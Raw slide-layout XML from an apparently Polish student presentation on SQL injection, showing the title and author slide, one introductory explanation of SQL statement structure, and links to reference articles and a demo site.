      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="258" name="Google Shape;258;p25"/>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259" name="Google Shape;259;p25"/>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5"/>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5"/>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2" name="Google Shape;262;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="23664" r="0" t="13299"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9525" y="-156200"/>
            <a:ext cx="4171950" cy="2933699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="263" name="Google Shape;263;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="21334" r="0" t="3883"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-10799995">
            <a:off x="5739700" y="2603702"/>
            <a:ext cx="3747200" cy="2835070"/>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8_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="264" name="Shape 264"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="265" name="Google Shape;265;p26"/>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266" name="Google Shape;266;p26"/>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6"/>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6"/>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9" name="Google Shape;269;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="20356" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4631025" y="510125"/>
            <a:ext cx="5524500" cy="4294700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="270" name="Google Shape;270;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="16645" r="0" t="537"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-5399997">
            <a:off x="-1058539" y="294014"/>
            <a:ext cx="5654502" cy="417781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7" name="Shape 27"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Google Shape;28;p4"/>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29" name="Google Shape;29;p4"/>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txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1168463"/>
            <a:ext cx="7704000" cy="57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AutoNum type="arabicPeriod"/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="romanLcPeriod"/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="2743200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="romanLcPeriod"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="3200400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="romanLcPeriod"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Google Shape;33;p4"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-825300" y="-371475"/>
            <a:ext cx="4857272" cy="3007325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Google Shape;34;p4"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5048253" y="2398274"/>
            <a:ext cx="5095572" cy="3154876"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Google Shape;35;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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6" name="Shape 36"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Google Shape;37;p5"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="17266" r="0" t="16652"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4688049" y="2278552"/>
            <a:ext cx="4684549" cy="2922100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Google Shape;38;p5"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="16618" r="0" t="14668"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="4">
            <a:off x="-57150" y="-190497"/>
            <a:ext cx="4810127" cy="3047996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Google Shape;39;p5"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="17753" l="0" r="0" t="1620"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-181700" y="-257175"/>
            <a:ext cx="9649551" cy="5667373"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Google Shape;40;p5"/>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5"/>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5"/>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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="540000"/>
            <a:ext cx="7704300" cy="5727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4" name="Google Shape;44;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1605775" y="3703499"/>
            <a:ext cx="2846700" cy="78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5" name="Google Shape;45;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4688050" y="3703499"/>
            <a:ext cx="2846700" cy="78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6" name="Google Shape;46;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1605779" y="3328943"/>
            <a:ext cx="2846700" cy="457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None/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>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47" name="Google Shape;47;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4688055" y="3328943"/>
            <a:ext cx="2846700" cy="457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None/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>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pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Google Shape;49;p6"/>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50" name="Google Shape;50;p6"/>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6"/>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6"/>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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705800" cy="5727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pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Google Shape;54;p6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="24087" r="0" t="19903"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-104775" y="-85500"/>
            <a:ext cx="3714749" cy="2426851"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55" name="Google Shape;55;p6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="22039" r="0" t="14089"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-10799995">
            <a:off x="5705475" y="2752926"/>
            <a:ext cx="3629025" cy="247629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6" name="Shape 56"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57" name="Google Shape;57;p7"/>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58" name="Google Shape;58;p7"/>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7"/>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7"/>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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4381506" y="887025"/>
            <a:ext cx="4038600" cy="956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2" name="Google Shape;62;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4381500" y="1843575"/>
            <a:ext cx="4038600" cy="2436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lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-311150" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1300"/>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-311150" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1300"/>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-311150" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1300"/>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-311150" lvl="5" marL="2743200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1300"/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-311150" lvl="6" marL="3200400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1300"/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-311150" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1300"/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-311150" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="Google Shape;63;p7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="24156" r="0" t="16303"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5767588" y="527636"/>
            <a:ext cx="4294574" cy="293450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4" name="Shape 64"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65" name="Google Shape;65;p8"/>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66" name="Google Shape;66;p8"/>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8"/>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8"/>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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2005350" y="1506750"/>
            <a:ext cx="5133300" cy="21300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6000"/>
              <a:buNone/>
              <a:defRPr sz="73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pic>
        <p:nvPicPr>
          <p:cNvPr id="70" name="Google Shape;70;p8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4270575" y="37800"/>
            <a:ext cx="6816287" cy="4220224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="71" name="Google Shape;71;p8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-5399997">
            <a:off x="-1890149" y="942974"/>
            <a:ext cx="6692275" cy="414345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2" name="Shape 72"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="73" name="Google Shape;73;p9"/>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74" name="Google Shape;74;p9"/>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9"/>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9"/>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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="970400" y="1168075"/>
            <a:ext cx="3133800" cy="1815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8" name="Google Shape;78;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="970400" y="3167250"/>
            <a:ext cx="3133800" cy="84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pic>
        <p:nvPicPr>
          <p:cNvPr id="79" name="Google Shape;79;p9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="19106" r="0" t="4942"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="-727588" y="1263239"/>
            <a:ext cx="4580326" cy="3332599"/>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0" name="Shape 80"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81" name="Google Shape;81;p10"/>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82" name="Google Shape;82;p10"/>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0"/>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0"/>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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="300">
            <a:off x="720000" y="3295650"/>
            <a:ext cx="3433500" cy="12072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2.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dk2"/>
            </a:gs>
            <a:gs pos="37000">
              <a:schemeClr val="dk1"/>
            </a:gs>
            <a:gs pos="63000">
              <a:schemeClr val="dk1"/>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="dk2"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="540001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82475" y="540000"/>
            <a:ext cx="77040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lt1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Audiowide"/>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Google Shape;7;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="782475" y="1152475"/>
            <a:ext cx="77040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1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="9144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2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="13716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3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="18288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4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="22860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5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="27432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6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="32004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7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="36576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8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="41148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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=2OPVViV-GQk" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://demo.testfire.net/index.jsp" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.youtube.com/watch?v=2OPVViV-GQk" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.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s://pl.wikipedia.org/wiki/SQL" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nordvpn.com/pl/blog/sql-injection-co-to/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ochronasieci.pl/zagrozenia-w-sieci/sql-injection/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackeru.pl/sql-injection/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/blog/sql-injection-attack/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/learn/out-of-band-sql-injection-oob-sqli/"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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1625850" y="1317528"/>
            <a:ext cx="5892300" cy="235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SQL Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="Google Shape;276;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1625850" y="3778500"/>
            <a:ext cx="5892300" cy="473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Alicja Kokoszkiewicz</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Grzegorz Zdobylak</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Michał Kowcz</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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="332300"/>
            <a:ext cx="7704000" cy="458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Instrukcje w SQL składają się z wyrażeń oraz klauzuli. Wyrażenie jest poleceniem (instrukcją), które określa, co należy zrobić. Klauzula służy do określenia ograniczeń dla danego polecenia i jest zapisywana w formie warunków.</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>Przykład:</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="F6B26B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
